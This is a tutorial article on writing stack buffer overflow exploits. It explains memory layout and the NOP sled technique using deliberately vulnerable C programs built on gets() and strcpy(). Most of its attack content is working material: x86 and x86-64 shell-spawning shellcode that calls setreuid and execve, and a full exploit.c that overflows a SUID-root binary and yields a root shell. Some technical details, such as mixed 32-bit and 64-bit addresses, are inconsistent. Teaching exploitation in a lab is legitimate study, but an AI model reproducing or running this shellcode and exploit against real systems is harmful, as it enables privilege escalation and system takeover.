In this article, I’m going to walk you through writing exploits that target specific vulnerabilities. Developing exploit code can be tricky, but we’ll break it down into steps to get a working exploit. We’ll start by understanding the different types of vulnerabilities we’re dealing with and how to identify them.

This content is not intended for beginners; it’s aimed at those who already have some understanding of programming and concepts like buffer overflows and memory management. If you’re not quite there yet, I recommend checking out this great series by 0x00pf: Programming Course for Wannabes.

Alright, let’s start with some fundamentals first.

Memory

The principle of exploiting a buffer overflow is to overwrite parts of memory that aren’t supposed to be overwritten with arbitrary input, and then make the process execute code of the attacker’s choosing. To see how and where an overflow takes place, let’s take a look at how memory is organized.

Code segment: the data in this segment are the assembler instructions that the processor executes. Code execution is non-linear; it can skip code, jump, and call functions on certain conditions. Therefore, we have a pointer called EIP, or instruction pointer. The address EIP points to always contains the code that will be executed next.

Data segment: space for variables and dynamic buffers.

Stack segment: used to pass data (arguments) to functions and as space for the local variables of functions. The bottom (start) of the stack usually resides at the high end of the process’s virtual address space, and the stack grows down toward lower addresses. The assembler command PUSHL adds an item to the top of the stack, and POPL removes one item from the top of the stack and puts it in a register. For accessing stack memory directly, there is the stack pointer ESP, which points at the top (lowest memory address) of the stack.

Next, let’s take a look at an example of a simple function written in assembly. A function is a piece of code in the code segment that is called, performs a task, and then returns to the previous thread of execution. Optionally, arguments can be passed to a function.

memory address		code
0x8054321 <main+x>	pushl $0x0
0x8054322		call $0x80543a0 <function>
0x8054327		ret
0x8054328		leave
...
0x80543a0 <function>	popl %eax
0x80543a1		addl $0xf00,%eax
0x80543a4		ret

What’s going on here? The main function calls function with a single argument. The argument is 0; main pushes it onto the stack and calls the function. The function gets the argument from the stack using popl. (This is a simplification: at function entry the return address sits on top of the stack, so real code would read the argument with something like movl 4(%esp), %eax.) After finishing, it returns to 0x8054327, the instruction after the call. Commonly, the called function also pushes register EBP onto the stack on entry and restores it before returning. This is the frame pointer concept, which allows the function to use its own offsets for addressing, and is mostly uninteresting while dealing with exploits.

We just have to know what the stack looks like. At the top, we have the internal buffers and variables of the function. After this, there is the saved EBP register (32 bit, which is 4 bytes), and then the return address, which is again 4 bytes. Further down, there are the arguments passed to the function, which are uninteresting to us. In this case, our return address is 0x8054327. It is automatically stored on the stack when the function is called. This return address can be overwritten, and changed to point to any point in memory, if there is an overflow somewhere in the code.

/* overflow.c */
#include <stdio.h>

void foo (void) {
	char small[30];
	gets (small);
	printf("%s\n", small);

}

int main() {
	foo();
	return 0;
}

Alright, so here we’re using gets() to read input into the small buffer. The issue is that gets() doesn’t perform any bounds checking. If a user inputs more than 29 characters (30 bytes including the terminating null), gets() writes past the end of the small array and starts overwriting adjacent memory. This is a classic buffer overflow, so let’s check it out:

(lldb) breakpoint set --name foo
Breakpoint 3: where = overflow`foo + 12 at overflow.c:6:2, address = 0x0000000100003f3c
(lldb) r
Process 25474 exited with status = 9 (0x00000009)
Process 25535 launched: '/overflow' (x86_64)
Process 25535 stopped
* 
    frame #0: 0x0000000100003f3c overflow`foo at overflow.c:6:2
   3
   4   	void foo (void) {
   5   		char small[30];
-> 6   		gets (small);
   7   		printf("%s\n", small);
   8
   9   	}
Target 0: (overflow) stopped.
(lldb) frame variable
(char [30]) small = "`\x80\f"
(lldb) memory read --size 1 --count 40 --format x --force (char*)&small
0x7ff7bfeff620: 0x60 0x80 0x0c 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff628: 0xa0 0x03 0x09 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff630: 0x60 0x3f 0x00 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff638: 0x10 0xc0 0x07 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff640: 0x60 0xf6 0xef 0xbf 0xf7 0x7f 0x00 0x00
(lldb) continue
Process 25535 resuming
warning: this program uses gets(), which is unsafe.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Process 25535 stopped
* thread #1, queue = '', stop reason = EXC_BAD_ACCESS (code=1, address=0x2a)
    frame #0: 0x0000000100000041 overflow`_mh_execute_header + 65
overflow`_mh_execute_header:
->  0x100000041 <+65>: addb   %al, (%rax)
    0x100000043 <+67>: addb   %al, (%rcx)
    0x100000045 <+69>: addb   %al, (%rax)
    0x100000047 <+71>: addb   %al, (%rax)
Target 0: (overflow) stopped.

We set a breakpoint on the function foo. When we run the program, it hits that breakpoint, and we can see it’s about to call gets(small), which is where the overflow will occur. At this point small has not been written yet, so frame variable shows whatever leftover data happens to be on the stack.

Next, we read 40 bytes starting at small, which is 10 bytes beyond the bounds of the 30-byte buffer. This lets us see the memory adjacent to the buffer, which is exactly what an overflow will overwrite.

After we continue and enter a line of “A” characters longer than the buffer, the program crashes with EXC_BAD_ACCESS: the saved data next to the buffer was overwritten, and execution ends up at an invalid location. This starkly illustrates the dangers of buffer overflows and of unsafe functions like gets().

Always remember: if you’re reading user input, you should check bounds to prevent overflows. Otherwise, you might end up with memory being overwritten. Alright, let’s move on.

What do you think is generally more safe: a program dynamically linked to its libraries or one statically linked to them?

Heap vs Stack based overflows

Dynamically allocated variables (those allocated by malloc()) are created on the heap. Unlike the stack, the heap grows upwards on most systems; that is, new variables created on the heap are located at higher memory addresses than older ones. In a simple heap-based buffer overflow attack, an attacker overflows a buffer that is lower on the heap, overwriting other dynamic variables, which can have unexpected and unwanted effects.

The stack, by contrast, starts at a high memory address and grows down toward lower memory addresses. Values are placed on and removed from the stack by the PUSH and POP instructions, respectively. A PUSH decrements the stack pointer and copies the value into the memory location the stack pointer now points to. Space for local variables is made the same way, by decrementing the stack pointer, for example with subl $20,%esp. POP is the reverse: it copies the value at the top of the stack into a register and increments the stack pointer.

Stack-based overflows are relatively simple in concept. They arise anywhere unchecked input is placed into a buffer of fixed length, typically through functions such as strcat(), sprintf(), strcpy(), gets(), etc.

Buffer overflows can be avoided by using bounded alternatives such as snprintf(), where the ‘n’ denotes an extra size parameter. That parameter limits how many bytes are written to the buffer; passing the complete buffer size means we never write past the end, never create the unwanted overflow, and never end up executing arbitrary data.

Let’s start with some vulnerable code to make the explanation clearer and easier to follow.

#include <stdlib.h>
#include <string.h>

void overflow_function (char *str)
{
  char buffer[20];
  strcpy(buffer, str);  // Copies str into buffer with no length check
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 127; i++)  // Loop 127 times
  {
    big_string[i] = 'A'; // And fill big_string with 'A's
  }
  big_string[127] = '\0'; // Terminate the string so strcpy() knows where it ends
  overflow_function(big_string);
  exit(0);
}

The function tries to write 128 bytes of data into the 20-byte buffer. The extra 108 bytes spill out, overwriting the stack frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with As (each one 0x41 in hexadecimal).

The program tries to return to this address, causing the EIP to go to 0x41414141, which is basically just some random address that is either in the wrong memory space or contains invalid instructions, causing the program to crash and die. This is called a stack-based overflow, because the overflow is occurring in the stack memory segment.

When overflow_function() is called, the stack frame looks something like this (lower addresses on the left):

  _________          ___________________________          __________________
 |         |        |                           |        |                  |
 | buffer  |------->| Stack frame pointer (sfp) |------->|  return address  |
 |         |        |                           |        |      (ret)       |
 |_________|        |___________________________|        |__________________|
    _________________________
   |                         |
   |  *str (function arg)    | ---> [[[The Rest of the Stack]]]
   |_________________________|

The program crashing as a result of a stack-based overflow isn’t really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141, such as an address where actual executable code was located, then the program would “return” to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user.

Because it’s possible to modify the return address to change the flow of execution by overflowing buffers, all that’s needed is something useful to execute. This is where bytecode injection comes into the picture. Bytecode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers.

The most common piece of bytecode is known as shellcode. This is a piece of bytecode that just spawns a shell. If a suid root program is tricked into executing shellcode, the attacker will have a user shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing.

The following program copies its first command-line argument into a 500-byte buffer on the stack. No size check takes place, so any argument longer than 499 characters overflows the buffer.

#include <string.h>

int main(int argc, char *argv[])
{
  char buffer[500];
  strcpy(buffer, argv[1]);  // No length check: argv[1] may exceed 500 bytes
  return 0;
}

The program really does nothing, except mismanage memory. Now to make it truly vulnerable, the ownership must be changed to the root user, and the suid permission bit must be turned on for the compiled binary:

$ sudo chown root f00
$ sudo chmod +s f00
$ ls -l f00
-rwsr-sr-x   1 root   users   4933 Sep 5 15:22 f00

Because of the suid bit, the program runs with root’s privileges even when executed by a “normal” user. By exploiting the stack buffer overflow vulnerability, we can run a shell with root’s privileges! How do we achieve this? We will write an exploit.

First we must create a special piece of binary code, the shellcode, whose purpose is to give us a root shell, and place it in the overflowing buffer. The return address must then be overwritten with the address of that shellcode. This means the actual address of the shellcode must be known ahead of time, which can be difficult to know in a dynamically changing stack. To make things even harder, the four bytes where the return address is stored in the stack frame must be overwritten with the value of this address. Even if the correct address is known, if the proper location isn’t overwritten, the program will just crash and die. Two techniques are commonly used to assist with this difficult chicanery.

The first is known as a NOP sled (NOP is short for no operation). This is a single byte instruction that does absolutely nothing. These are sometimes used to waste computational cycles for timing purposes and are actually necessary in the Sparc processor architecture due to instruction pipelining.

In this case, these NOP instructions are going to be used for a different purpose; they’re going to be used as a fudge factor. By creating a large array (or sled) of these NOP instructions and placing it before the shellcode, if the EIP returns to any address found in the NOP sled, the EIP will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP will slide down the sled to the shellcode, which will execute properly.

The second technique is flooding the end of the buffer with many back-to-back instances of the desired return address. This way, as long as any one of these return addresses overwrites the actual return address, the exploit will work as desired.

Here is a representation of a crafted buffer:

  __________       ___________        _________________________
 |          |     |           |      |                         |
 | NOP sled | --->| ShellCode | ---> | Repeated return address |
 |__________|     |___________|      |_________________________|

Even using both of these techniques, the approximate location of the buffer in memory must be known in order to guess the proper return address. One technique for approximating the memory location is to use the current stack pointer as a guide. By subtracting an offset from this stack pointer, the relative address of any variable can be obtained. Because, in this vulnerable program, the first element on the stack is the buffer the shellcode is being put into, the proper return address should be the stack pointer, which means the offset should be close to 0. The NOP sled becomes increasingly useful when exploiting more complicated programs, when the offset isn’t 0.

Shellcode Development

The shellcode must be self-contained and must avoid null bytes, because these will end the string. If the shellcode has a null byte in it, a strcpy() function will recognize that as the end of the string. In order to write a piece of shellcode, an understanding of the assembly language of the target processor is needed. In this case, it’s x86 assembly language.

The following are some instructions that will be used in the construction of shellcode.

mov     ; Move instruction
        ; Used to set initial values
        mov <dest>, <src>   ; Move the value from <src> into <dest>

add     ; Add instruction
        ; Used to add values
        add <dest>, <src>   ; Add the value in <src> to <dest>

sub     ; Subtract instruction
        ; Used to subtract values
        sub <dest>, <src>   ; Subtract the value in <src> from <dest>

push    ; Push instruction
        ; Used to push values onto the stack
        push <target>       ; Push the value in <target> onto the stack

pop     ; Pop instruction
        ; Used to pop values off the stack
        pop <target>        ; Pop a value from the stack into <target>

Reference: Programming for Wannabees. Part III. Your First Shell Code

Beyond the basic assembly instructions, Linux provides a set of system calls that can be invoked directly from assembly. On 32-bit x86 they are reached through the int 0x80 software interrupt; on x86-64, through the syscall instruction. Each system call is identified by a number, and the generic table of numbers is defined in /usr/include/asm-generic/unistd.h.

$ head -n 80 /usr/include/asm-generic/unistd.h

/*
 * This file contains the system call numbers, based on the
 * layout of the x86-64 architecture, which embeds the
 * pointer to the syscall in the table.
 *
 * As a basic principle, no duplication of functionality
 * should be added, e.g. we don't use lseek when llseek
 * is present. New architectures should use this file
 * and implement the less feature-full calls in user space.
 */

#ifndef __SYSCALL
#define __SYSCALL(x, y)
#endif

#if __BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT)
#define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _32)
#else
#define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _64)
#endif

#ifdef __SYSCALL_COMPAT
#define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _comp)
#define __SC_COMP_3264(_nr, _32, _64, _comp) __SYSCALL(_nr, _comp)
#else
#define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _sys)
#define __SC_COMP_3264(_nr, _32, _64, _comp) __SC_3264(_nr, _32, _64)
#endif

...

Using the simple assembly instructions outlined earlier, along with the system call numbers, you can write a variety of assembly programs and bytecode snippets to perform numerous functions. Keep in mind that system call numbers are architecture-specific: the generic table in /usr/include/asm-generic/unistd.h is the one used by newer architectures, while 32-bit x86 and x86-64 each have their own numbering (on many distributions found in asm/unistd_32.h and asm/unistd_64.h).

Shell-Spawning

Shell-spawning code is simple code that executes a shell and can be converted into shellcode. The two essential functions required for this process are execve() and setreuid(). On 32-bit x86 these are system call numbers 11 and 70, respectively; on x86-64 they are 59 and 113.

The execve() call is responsible for executing /bin/sh, effectively launching a new shell instance. The setreuid() call is crucial for restoring root privileges, especially in scenarios where they may have been dropped for security reasons. Many SUID root programs will relinquish root privileges whenever possible, and if these privileges aren’t restored in the shellcode, the resulting shell will only have normal user privileges.

There’s no need to include an exit() function call since an interactive shell program is being spawned. While an exit() call wouldn’t cause any issues, it has been omitted from this example to keep the code as compact as possible.

section .text
global _start

_start:
    ; Step 1: setreuid(0, 0) to restore root privileges
    xor rax, rax                ; Clear rax register (set to 0)
    mov al, 113                 ; Load syscall number for setreuid (113 on x86-64) into al
    xor rdi, rdi                ; Set real UID (rdi) to 0 (root)
    xor rsi, rsi                ; Set effective UID (rsi) to 0 (root)
    syscall                     ; Trigger the kernel to execute the syscall

    ; Step 2: Spawn a new shell (/bin/sh)
    xor rax, rax                ; Clear rax again (it held the syscall's return value)
    push rax                    ; Push 8 zero bytes to null-terminate the string
    mov rdi, 0x68732f2f6e69622f ; Load the 8 bytes of "/bin//sh" into rdi
    push rdi                    ; Push the string itself onto the stack
    mov rdi, rsp                ; Set rdi to point to the string (first execve argument)
    push rax                    ; Push NULL to terminate the argv array (argv[1])
    push rdi                    ; Push the pointer to the string (argv[0])
    mov rsi, rsp                ; Set rsi to point to the argv array on the stack
    xor rdx, rdx                ; Clear rdx (envp = NULL, no environment variables)
    mov al, 59                  ; Load syscall number for execve (59) into al
    syscall                     ; Trigger the kernel to execute the new shell

Here, rax is cleared to ensure it starts in a known state. We then load the syscall number for setreuid into al, the lowest 8 bits of rax, which lets us specify the syscall with a single byte and no null padding. The xor rdi, rdi and xor rsi, rsi instructions set the two arguments, the real and effective user IDs, to zero, which corresponds to the root user. Finally, the syscall instruction asks the kernel to apply these changes.

The xor rax, rax clears rax again, since it now holds the return value of the previous syscall. We push that zero onto the stack so that the string that follows is null-terminated. The mov rdi, 0x68732f2f6e69622f instruction loads the eight bytes of the string /bin//sh into rdi (the doubled slash pads the path to exactly eight bytes and is harmless). The string is then pushed onto the stack, and rsp (the stack pointer) is copied into rdi, pointing it at the command string.

The next two push instructions are critical: they build the argv array for the execve syscall. The first, push rax, places the NULL pointer that terminates the array (argv[1]); the second, push rdi, places the pointer to our command string in front of it (argv[0]). Finally, mov rsi, rsp points rsi to the array of arguments.

The code wraps up by clearing rdx, indicating that there are no environment variables, before loading the syscall number for execve into al. The final syscall invokes the kernel to run the new shell.

Now let’s try to assemble and link this piece of code to see if it works.

$ nasm -f elf64 shell.asm -o shell.o
$ ld -o shell shell.o

$ ./shell
$ 
$ exit
$ sudo chown root shell
$ sudo chmod +s shell
$ ./shell
#

The program spawns a shell as expected, and if you change the program’s owner to root and set the SUID (Set User ID) permission bit, it’ll give you a root shell. That’s pretty powerful, but now let’s focus on extracting the shellcode.

To pull the raw shellcode from our assembled binary, you can use the following command:

objdump -M intel -d shell | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'

The program successfully spawns a shell, but one detail deserves attention before calling it proper shellcode: where the /bin/sh string lives. A straightforward version of this program would store the string in the data segment. This is fine for standalone programs, but shellcode isn’t a traditional executable; it’s a snippet of code meant to be injected into a running program for execution. The string therefore has to travel with the instructions. The version above does this by pushing the string onto the stack at run time. The other classic approach is to place the string alongside the assembly instructions and find a way to reference its address.

The challenge with that approach is that the exact memory location of the executing shellcode isn’t known in advance, so we need to derive the address relative to the EIP (the instruction pointer). Thankfully, we can use the jmp and call instructions, which support addressing relative to the EIP. This allows us to locate our string in the same memory space as the executing code.

Here’s the breakdown: a call instruction not only moves the EIP to a specified memory location, like a jmp instruction, but it also pushes the return address onto the stack, enabling program execution to resume after the call. If the instruction following the call is a string instead of an instruction, the return address can be popped off the stack and used to reference that string.

The mechanics work like this: at the start of execution, the program jumps to a location at the bottom of the code where a call instruction and the string are defined. When the call executes, the string’s address gets pushed onto the stack. The call then jumps execution back up to a point just below the previous jump instruction, allowing the address of the string to be popped from the stack. Now the program holds a pointer to the string and can carry out its operations, while the string remains neatly tucked away at the end of the code.

jmp two
one:
pop ebx
<program code here>
two:
call one
db 'this is a string'

Here’s how it unfolds: the program jumps down to two, then it calls back up to one, pushing the return address (which is the address of the string) onto the stack. When it pops this address into the EBX register, the program gains access to the string’s address and can execute whatever code it needs.

The stripped-down shellcode employing the call trick to get the address to the string looks something like this:

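section .text
global _start

_start:
    jmp short get_string    ; Jump down to the call at the bottom
use_string:
    pop ebx                 ; ebx now holds the address of the string (32-bit form)
    ; <program code here>
get_string:
    call use_string         ; Pushes the address of the string, then jumps back up
string_address:
    db 'this is a string'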

The shellcode in shellcode.asm still isn’t ready for action. While it can spawn a shell, it’s not usable as proper shellcode as long as it contains null bytes. Null bytes terminate strings in C, so if our shellcode contains any, only the bytes leading up to the first null byte will be copied into the target buffer.

$ hexeditor shellcode
00000110  31 C0 B0 46  31 DB 31 C9   CD 80 31 C0  50 68 2F 2F 1..F1.1...1.Ph//   
00000120  73 68 68 2F  62 69 6E 89   E3 50 53 89  E1 31 D2 B0 shh/bin..PS..1..   
00000130  0B CD 80 00  00 00 00 00   00 00 00 00  00 00 00 00 ................

The null bytes are problematic, as they signify the end of the shellcode string. For the shellcode to copy correctly into buffers, we need to eliminate these null bytes.

The main culprits for these null bytes are the instructions that move a static value of 0 into registers. To remove these null bytes while retaining functionality, we can find a way to get the value of 0 into a register without explicitly using the number 0. One approach is to load an arbitrary 32-bit value into the register and then subtract that same value:

mov ebx, 0x11223344
sub ebx, 0x11223344

While this method works, it uses two instructions, which bloats the shellcode. Fortunately, there’s a more efficient way: using the XOR instruction.

The XOR instruction performs an exclusive OR operation on the bits of the registers, transforming them as follows:

1 xor 1 = 0
0 xor 0 = 0
1 xor 0 = 1
0 xor 1 = 1

By XORing a register with itself, we can effectively set it to 0 in a single instruction, thereby avoiding null bytes in our shellcode:

xor ebx, ebx  ; Sets ebx to 0 without introducing null bytes

This neat trick allows us to produce functional shellcode while maintaining its compactness. Now that we have a solid understanding of writing shellcode and ensuring it’s free of null bytes, we can move on to crafting an actual exploit.

Write Your First Exploit

Writing an exploit program can certainly get the job done, but it introduces a barrier between the researcher and the vulnerable application. The compiler handles many aspects of the exploit, which removes a layer of interactivity crucial for exploration and experimentation.

To gain a full understanding of this process, the ability to quickly test different scenarios is vital. With just a few tools, specifically Python’s print function and the command substitution feature in the bash shell, you can effectively exploit a vulnerable program.

$ python3 -c 'print("A"*20)'

This command simply prints the character A 20 times. You can also specify characters by their hexadecimal value, which is how non-printable bytes are produced. For example, the character A has the hexadecimal value 0x41, so the same output can be written as:

$ python3 -c 'print("\x41"*20)'

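Both commands yield the same output of AAAAAAAAAAAAAAAAAAAA, showcasing how easy it is to manipulate input. One caveat for bytes above 0x7f: Python 3’s print() encodes its output as text (typically UTF-8), so "\x90" does not come out as a single 0x90 byte; sys.stdout.buffer.write(b"\x90"*200) writes the raw bytes instead. Python can also run other commands. For example: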

$ python3 -c 'import os; os.system("uname -a")'

Here, we leverage Python to execute uname -a. Going the other way, the shell’s command substitution (backticks or $(...)) lets the output of a Python one-liner be passed as an argument to another program. Exploit code has to work out a stack address, create a crafted buffer, and feed it to the vulnerable program; with Python, command substitution, and an approximate return address, all of this can be done directly from the command line. Next, we can use GDB to find the stack address necessary for our return.

First, disassemble main and set a breakpoint on the strcpy call:

(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555139 <+0>: push %rbp
0x000055555555513a <+1>: mov %rsp,%rbp
0x000055555555513d <+4>: sub $0x210,%rsp
0x0000555555555144 <+11>: mov %edi,-0x204(%rbp)
0x000055555555514a <+17>: mov %rsi,-0x210(%rbp)
0x0000555555555151 <+24>: mov -0x210(%rbp),%rax
0x0000555555555158 <+31>: add $0x8,%rax
0x000055555555515c <+35>: mov (%rax),%rdx
0x000055555555515f <+38>: lea -0x200(%rbp),%rax
0x0000555555555166 <+45>: mov %rdx,%rsi
0x0000555555555169 <+48>: mov %rax,%rdi
0x000055555555516c <+51>: call 0x555555555030 <strcpy@plt>
0x0000555555555171 <+56>: mov $0x0,%eax
0x0000555555555176 <+61>: leave
0x0000555555555177 <+62>: ret

(gdb) b *0x555555555030
Breakpoint 1 at 0x555555555030
(gdb) run `python3 -c 'print("\x90"*200)'`
Breakpoint 1, 0x0000555555555030 in strcpy@plt ()
(gdb) info register

We set a breakpoint at the strcpy address, 0x555555555030. When the breakpoint is hit inside strcpy, we check the registers to identify the stack address. Next, we append the shellcode to a NOP sled. Having your shellcode stored in a file makes it easier to manage. By leveraging the hexadecimal bytes we’ve already defined, we can write them directly to a file.

Here’s a look at exploit.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

// Note: this program is written for 32-bit x86. Addresses are treated as
// 4 bytes wide and the shellcode uses the 32-bit int 0x80 interface.

// Return the current value of the stack pointer
uint32_t sp(void) {
    uint32_t value;
    __asm__("movl %%esp, %0" : "=r"(value));
    return value;
}

int main(int argc, char *argv[]) {
    size_t i;
    uint32_t offset, esp, ret, *addr_ptr;
    char *buffer, *ptr;

    // Define the shellcode
    char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0"
                       "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
                       "\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

    offset = 0;
    esp = sp();
    ret = esp - offset;

    printf("Stack pointer (ESP) : 0x%x\n", esp);
    printf("    Offset from ESP : 0x%x\n", offset);
    printf("Desired Return Addr : 0x%x\n", ret);

    // Allocate 600 bytes for the buffer
    buffer = malloc(600);
    if (buffer == NULL) {
        return 1;
    }

    // Fill the entire buffer with the desired return address (4 bytes each)
    ptr = buffer;
    addr_ptr = (uint32_t *)ptr;
    for (i = 0; i < 600; i += 4) {
        *(addr_ptr++) = ret;
    }

    // Fill the first 200 bytes with NOP instructions
    for (i = 0; i < 200; i++) {
        buffer[i] = '\x90';
    }

    // Put the shellcode after the NOP sled
    ptr = buffer + 200;
    for (i = 0; i < strlen(shellcode); i++) {
        *(ptr++) = shellcode[i];
    }

    // Null terminate the buffer
    buffer[600 - 1] = 0;

    // Execute the vulnerable program with our crafted buffer
    execl("./f00", "f00", buffer, NULL);
    free(buffer);   // Only reached if execl() fails

    return 0;
}

Finally, compile and execute the exploit:

$ gcc -o exploit exploit.c 
$ ./exploit
Stack pointer (ESP) : 0x650bc0f0
    Offset from ESP : 0x0
Desired Return Addr : 0x650bc0f0
# whoami
root
#

And there you have it! The exploit successfully overwrites the return address on the stack with the address printed above (0x650bc0f0 in this run), which points into our NOP sled and from there leads to the shellcode. Since the vulnerable program has SUID root permissions, executing this shellcode grants us a root shell. This shows the culmination of our understanding of shellcode writing, stack manipulation, and exploit creation, an essential journey for any wannabe hacker.

The Last Opcode

By now, you should be familiar with the concept of stack-based overflows, the construction and execution of shellcode, and the ability to recognize some basic Assembly instructions.

As you go deeper into this field, remember that practice is key. Experiment with different techniques, analyze real-world exploits, and continue building your understanding of low-level programming and system vulnerabilities. That’s all for now. Hope you picked up some knowledge. Until next time!

References